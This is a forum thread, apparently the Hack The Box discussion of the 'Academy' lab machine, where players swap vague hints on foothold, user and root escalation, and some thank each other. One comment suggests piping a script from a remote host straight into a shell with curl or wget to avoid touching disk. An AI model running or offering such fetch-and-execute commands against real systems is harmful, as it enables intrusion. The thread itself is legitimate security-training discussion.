Official Academy Discussion


Comments

  • Need a hint with root, going through /var/log but I can't get a clue to root this box.

  • edited November 2020

    @0xstain said:

    Need a hint with root, going through /var/log but I can't get a clue to root this box.

    Are you going through /var/log with the user with user.txt in his home folder?

  • edited November 2020

    removed by user

  • Hello Guys and Gals,

    Could someone possibly help me with the Foothold - I've found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc and still struggling. My weak point is definitely DNS Enumeration so this could possibly be my weakness here.

    Many Thanks, Taz

  • @TaZ0w said:

    Hello Guys and Gals,

    Could someone possibly help me with the Foothold - I've found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc and still struggling. My weak point is definitely DNS Enumeration so this could possibly be my weakness here.

    Many Thanks, Taz

    I doubt that DNS enum/fuzzing will get you anywhere. You should rather investigate data you send to and receive from the server.


    Hack The Box
    GREM | OSCE | GASF | eJPT

  • @TaZ0w said:

    Could someone possibly help me with the Foothold - I've found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc and still struggling.

    Have you visited the site in a browser?

    Have you run a directory busting tool? (I found gobuster better than dirb here but YMMV).

    If the answer to both is "yes" then look into what happens when you create a new thing and see what you can modify. When you modify it in a way it still works, see if you can now access one of the other things you should have found.

    My weak point is definitely DNS Enumeration so this could possibly be my weakness here.

    HTB doesn't tend to use DNS.

    Many Thanks, Taz

    Hi :smile:

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • edited November 2020

    @TazWake said:

    @TaZ0w said:

    If the answer to both is "yes" then look into what happens when you create a new thing and see what you can modify. When you modify it in a way it still works, see if you can now access one of the other things you should have found.

    My weak point is definitely DNS Enumeration so this could possibly be my weakness here.

    HTB doesn't tend to use DNS.

    Many Thanks, Taz

    Hi :smile:

    Hey fellow Taz :smile:

    Yes to both of those - Your comment here though has made something go "ping" in my head. Thanks man, let me have a poke around, I'll let you know how I get on!

    T

  • edited November 2020

    @TazWake said:

    @TaZ0w said:

    Hi :smile:

    Jesus, thanks man - It's amazing how simple some things can be - I've spent literally 2 hours on DNS today and it was as simple as the r****d :smile:

    I now have the subdomain, so onwards and upwards! :)

  • @TaZ0w said:

    Yes to both of those - Your comment here though has made something go "ping" in my head. Thanks man, let me have a poke around, I'll let you know how I get on!

    Awesome.

    A small change on one POST request should allow you to access a page you couldn't access before. That holds a wealth of useful information.

    TazWake


  • edited November 2020
    I'm so lost getting 2nd user. Spent hours in /var/logs but I'm not sure what to look for. Could someone PM me a nudge?

    edit: never mind, I got it

  • For anyone who reads this: use mktemp -d to create a temporary directory and stop downloading your scripts to the /home directory

  • @Feror said:

    For anyone who reads this: use mktemp -d to create a temporary directory and stop downloading your scripts to the /home directory

    There's no need to even download the scripts to disk, you can simply curl http://ip:port/script.sh | sh (or wget -O - ... when curl isn't available)



  • edited November 2020

    So many hours wasted trying to grep through /var/logs. Once I got past the first user I got root within 5 minutes.

    Had to use a local tool I'd never heard of before. Feel free to PM for nudges but let me know what you've already tried. Plenty of hints for foothold and first user through the thread

    cmoon

  • Really funny box, if anyone gets stuck on log files, update your enum script version and try again (it took me 2 hours :( )

    Thanks for this box :) Rooted


    You can pm me on discord sh4d0wless#6154

  • @tsheva said:

    @0xstain said:

    Need a hint with root, going through /var/log but I can't get a clue to root this box.

    Are you going through /var/log with the user with user.txt in his home folder?

    Yes, I have user, not www-data.

  • Hello friends, I hope that you are doing great out there. I'm stuck with root. When I try to run the script c******* run-script command I end up with this error: Script "command" is not defined in this package. Any solution or hint appreciated.

  • Nice box, finally rooted! If you need a nudge, you can PM me

    akhlaqur

  • Finally rooted! if anyone needs a nudge PM me

  • fun box


  • Finally made it. Feel free to PM for a nudge.

    Harbard

  • rooted, need a nudge? just pm.

  • Rooted now, learned some things doing this box!

  • What a traumatic machine... I was so frustrated that I was going to skip this machine. Thanks to @IvanV who motivated me to go on.

    Lesson learned: Even when you think you know how to retrieve things, GOOGLE IT!!!! 😂

  • Anyone do the user part manually?

    Huejash0le

  • I was able to escalate my privs on the webpage but I don't fully understand why it worked that way. Can someone point me in the right direction on documentation or explain why changing a certain value worked the way it did? Thanks in advance!

  • edited November 2020

    Rooted the machine, it was a really fun box, learned a lot.
    PM for a nudge, good luck

  • Rooted. The hardest part was definitely getting that 2nd user. Foothold wasn't too bad and root was the easiest. @sh4d0wless mentioned updating enum script and running again. That's what did it for me.

  • edited November 2020

    I too am stuck on the foothold thing. I believe I found the small change I need to make. I would be happy to discuss my strategy to see if I am headed in the right direction. So far none of the changes allows any new access. I'm sure it's got to be something even more simple than what I'm attempting...

  • @Sc0rp10ne said:

    I too am stuck on the foothold thing. I believe I found the small change I need to make. I would be happy to discuss my strategy to see if I am headed in the right direction. So far none of the changes allows any new access. I'm sure it's got to be something even more simple than what I'm attempting...

    It is a small change. When you make it and it still works, you can log in to a new page with the credentials you have created.

    TazWake

